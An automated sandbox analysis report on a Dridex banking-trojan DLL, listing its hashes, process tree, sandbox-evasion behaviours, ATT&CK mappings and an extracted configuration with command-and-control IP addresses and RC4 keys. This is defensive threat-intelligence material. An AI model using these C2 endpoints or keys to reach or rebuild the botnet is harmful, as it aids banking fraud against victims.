Windows Analysis Report L0mddDYjoL.dll

Overview

General Information

Sample Name: L0mddDYjoL.dll
Analysis ID: 545443
MD5: 0d9cc367aa4abc5620b6fcf8e9272f53
SHA1: cb6db576bbe636a895d0ad3e3136483d0ec777be
SHA256: 1bd2e431f2631a5bfc21a9e244bb28d4230dad825b9d6396afcd32458923fb0a
Tags: 32, dll, Dridex, exe, trojan

Detection

Dridex
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Call by Ordinal
Tries to delay execution (extensive OutputDebugStringW loop)
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6400 cmdline: loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5696 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4988 cmdline: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6340 cmdline: rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.rundll32.exe.6e9a0000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
6.0.rundll32.exe.6e9a0000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
6.0.rundll32.exe.6e9a0000.5.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
1.2.loaddll32.exe.6e9a0000.2.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |
5.0.rundll32.exe.6e9a0000.5.unpack | JoeSecurity_Dridex_1 | Yara detected Dridex unpacked file | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1, ProcessId: 4988

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.loaddll32.exe.6e9a0000.2.unpack, Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["104.36.167.47:443", "188.40.48.93:4664", "162.241.33.132:9217", "217.160.5.104:593"], "RC4 keys": ["MVvOFIilF0NXOL2BGlf3SZonbBup17KA", "6UfDOLUgX3hJ3XaposUIUiva9uclhs6fenw01keZT6Cxe8VImuG9Uw6F4mFEkE0ddDT1py8ABw"]}
Multi AV Scanner detection for submitted file
Source: L0mddDYjoL.dll, Virustotal: Detection: 63%
Source: L0mddDYjoL.dll, ReversingLabs: Detection: 67%
Machine Learning detection for sample
Source: L0mddDYjoL.dll, Joe Sandbox ML: detected
Source: L0mddDYjoL.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: L0mddDYjoL.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, IPs: 104.36.167.47:443
Source: Malware configuration extractor, IPs: 188.40.48.93:4664
Source: Malware configuration extractor, IPs: 162.241.33.132:9217
Source: Malware configuration extractor, IPs: 217.160.5.104:593
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, ASN Name: GIGASNET-ASUS
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View, IP Address: 162.241.33.132
Source: Joe Sandbox View, IP Address: 104.36.167.47
Source: Joe Sandbox View, IP Address: 217.160.5.104
Source: WerFault.exe, 0000000A.00000002.384805542.00000000033AD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.384776459.0000000003370000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.10.dr, String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000001.00000002.684128796.0000000000BCB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file
Source: Yara match, File source: 5.0.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.rundll32.exe.6e9a0000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.loaddll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.rundll32.exe.6e9a0000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.rundll32.exe.6e9a0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.365127503.000000006E9A1000.00000020.00020000.sdmp, type: MEMORY

                      System Summary:

                      Source: L0mddDYjoL.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: L0mddDYjoL.dll; Binary or memory string: OriginalFilenameHen.dllD vs L0mddDYjoL.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728
                      Source: C:\Windows\System32\loaddll32.exe; Section loaded: lz32.dll
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9B0730
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9B9370
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9A1494
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9AA4E8
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9B143C
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9A8428
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9B2234 NtDelayExecution
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9B2820 NtAllocateVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9ABB44 NtClose
                      Source: C:\Windows\System32\loaddll32.exe; Process Stats: CPU usage > 98%
                      Source: L0mddDYjoL.dll; Virustotal: Detection: 63%
                      Source: L0mddDYjoL.dll; ReversingLabs: Detection: 67%
                      Source: L0mddDYjoL.dll; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt
                      Source: unknown; Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll"
                      Source: C:\Windows\System32\loaddll32.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848
                      Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6340
                      Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
                      Source: C:\Windows\SysWOW64\WerFault.exe; File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A30.tmp
                      Source: classification engine; Classification label: mal80.troj.evad.winDLL@9/10@0/4
                      Source: C:\Windows\SysWOW64\WerFault.exe; File read: C:\Windows\System32\drivers\etc\hosts
                      Source: L0mddDYjoL.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: L0mddDYjoL.dll; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ffty.pdb source: WerFault.exe, 0000000A.00000003.374308414.00000000055E6000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384837541.0000000005028000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.384762603.0000000005028000.00000004.00000040.sdmp, L0mddDYjoL.dll
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 1_2_6E9AF6A8 push esi; mov dword ptr [esp], 00000000h 1_2_6E9AF6A9
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to delay execution (extensive OutputDebugStringW loop)
                      Source: C:\Windows\System32\loaddll32.exe Section loaded: OutputDebugStringW count: 1001
                      Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1001
                      Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6E9B0730 GetTokenInformation,GetSystemInfo,GetTokenInformation,1_2_6E9B0730
                      Source: Amcache.hve.10.dr Binary or memory string: VMware
                      Source: Amcache.hve.10.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.10.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.10.dr Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.10.dr Binary or memory string: VMware7,1
                      Source: Amcache.hve.10.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.10.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 0000000A.00000002.384767858.0000000003360000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.384939037.0000000004FA6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.10.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.10.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: WerFault.exe, 0000000A.00000002.384776459.0000000003370000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWonicdLocal Area Connection* 8-QoS Packet Scheduler-0000
                      Source: Amcache.hve.10.dr Binary or memory string: VMware, Inc.me
                      Source: Amcache.hve.10.dr Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: Amcache.hve.10.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.10.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6E9A6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,1_2_6E9A6D0C
                      Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6E9B3138 RtlAddVectoredExceptionHandler,1_2_6E9B3138
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                      Source: loaddll32.exe, 00000001.00000002.684736046.0000000001350000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.369073399.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.371411387.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.363318375.00000000034D0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.364945140.00000000034D0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000001.00000002.684736046.0000000001350000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.369073399.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.371411387.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.363318375.00000000034D0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.364945140.00000000034D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000001.00000002.684736046.0000000001350000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.369073399.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.371411387.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.363318375.00000000034D0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.364945140.00000000034D0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000001.00000002.684736046.0000000001350000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.369073399.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.371411387.00000000037C0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.363318375.00000000034D0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.364945140.00000000034D0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,1_2_6E9A6D0C
                      Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6E9A6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,1_2_6E9A6D0C
                      Source: Amcache.hve.10.dr, Amcache.hve.LOG1.10.dr Binary or memory string: c:\users\user\desktop\procexp.exe
                      Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.10.dr, Amcache.hve.LOG1.10.dr Binary or memory string: procexp.exe

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (12) | Virtualization/Sandbox Evasion (1) | Input Capture (1) | Security Software Discovery (21) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (12) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery (13) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      [Behavior graph, image not reproduced] Behavior Graph ID: 545443, Sample: L0mddDYjoL.dll, Startdate: 26/12/2021, Architecture: WINDOWS, Score: 80
                      Network nodes: 162.241.33.132 (UNIFIEDLAYER-AS-1US, United States), 217.160.5.104 (ONEANDONE-ASBrauerstrasse48DE, Germany), 2 other IPs or domains
                      Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Dridex unpacked file; 3 other signatures
                      Processes: loaddll32.exe started cmd.exe and rundll32.exe; cmd.exe started rundll32.exe; each rundll32.exe started WerFault.exe
                      Signature on loaddll32.exe: Tries to delay execution (extensive OutputDebugStringW loop)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      L0mddDYjoL.dll | 63% | Virustotal |
                      L0mddDYjoL.dll | 67% | ReversingLabs | Win32.Infostealer.Dridex
                      L0mddDYjoL.dll | 100% | Joe Sandbox ML |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      6.2.rundll32.exe.bf0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      1.2.loaddll32.exe.6e9a0000.2.unpack | 100% | Avira | HEUR/AGEN.1144420
                      5.0.rundll32.exe.2f40000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.0.rundll32.exe.6e9a0000.2.unpack | 100% | Avira | HEUR/AGEN.1144420
                      5.0.rundll32.exe.6e9a0000.2.unpack | 100% | Avira | HEUR/AGEN.1144420
                      5.0.rundll32.exe.2f40000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.0.rundll32.exe.bf0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      5.2.rundll32.exe.2f40000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      6.0.rundll32.exe.6e9a0000.5.unpack | 100% | Avira | HEUR/AGEN.1144420
                      5.0.rundll32.exe.6e9a0000.5.unpack | 100% | Avira | HEUR/AGEN.1144420
                      6.2.rundll32.exe.6e9a0000.2.unpack | 100% | Avira | HEUR/AGEN.1144420
                      6.0.rundll32.exe.bf0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      1.2.loaddll32.exe.960000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://upx.sf.net | Amcache.hve.10.dr | false | | high

                        Contacted IPs

                        Public

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        162.241.33.132 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                        104.36.167.47 | unknown | United States | 27640 | GIGASNET-ASUS | true
                        217.160.5.104 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                        188.40.48.93 | unknown | Germany | 24940 | HETZNER-ASDE | true

                        General Information

                        Joe Sandbox Version: 34.0.0 Boulder Opal
                        Analysis ID: 545443
                        Start date: 26.12.2021
                        Start time: 17:25:20
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 6m 43s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Sample file name: L0mddDYjoL.dll
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Run name: Run with higher sleep bypass
                        Number of analysed new started processes analysed: 28
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal80.troj.evad.winDLL@9/10@0/4
                        EGA Information: Failed
                        HDC Information:
                        • Successful, ratio: 99.8% (good quality ratio 94.2%)
                        • Quality average: 77.3%
                        • Quality standard deviation: 28.8%
                        HCA Information: Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                        • Found application associated with file extension: .dll
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 104.208.16.94
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                • 217.160.0.168
                                                                                                                                                0rder_004.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.160.0.150
                                                                                                                                                fvvAQ9kNaR41I5u.exeGet hashmaliciousBrowse
                                                                                                                                                • 217.160.0.244
                                                                                                                                                UNIFIEDLAYER-AS-1USG7ABVJxc3Z.dllGet hashmaliciousBrowse
                                                                                                                                                • 162.241.33.132
                                                                                                                                                L0mddDYjoL.dllGet hashmaliciousBrowse
                                                                                                                                                • 162.241.33.132
                                                                                                                                                hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                                                                • 162.241.33.132
                                                                                                                                                hMUh2Mkqyi.dllGet hashmaliciousBrowse
                                                                                                                                                • 162.241.33.132
                                                                                                                                                QmRD3TL34pGet hashmaliciousBrowse
                                                                                                                                                • 98.131.204.234
                                                                                                                                                QiZ1RADVGt.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                Aw8F7Ua3w7.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                dSeuQsymrQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                1WaWsMTrjt.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                POWKlAddNj.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                wJb8YRaQ9Y.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                LcTYOSCFws.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                8LuKQEfuX9.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.5.67
                                                                                                                                                MZf48VAxT7.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                iOXn4DA38y.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                wxSfUTFXM3.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                GsWdBjZeXt.exeGet hashmaliciousBrowse
                                                                                                                                                • 216.172.160.230
                                                                                                                                                HvM9U2PXj8Get hashmaliciousBrowse
                                                                                                                                                • 76.163.41.198
                                                                                                                                                rAFAiRUA1V.dllGet hashmaliciousBrowse
                                                                                                                                                • 162.214.50.39
                                                                                                                                                J25211072U.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.6.31
                                                                                                                                                GIGASNET-ASUSG7ABVJxc3Z.dllGet hashmaliciousBrowse
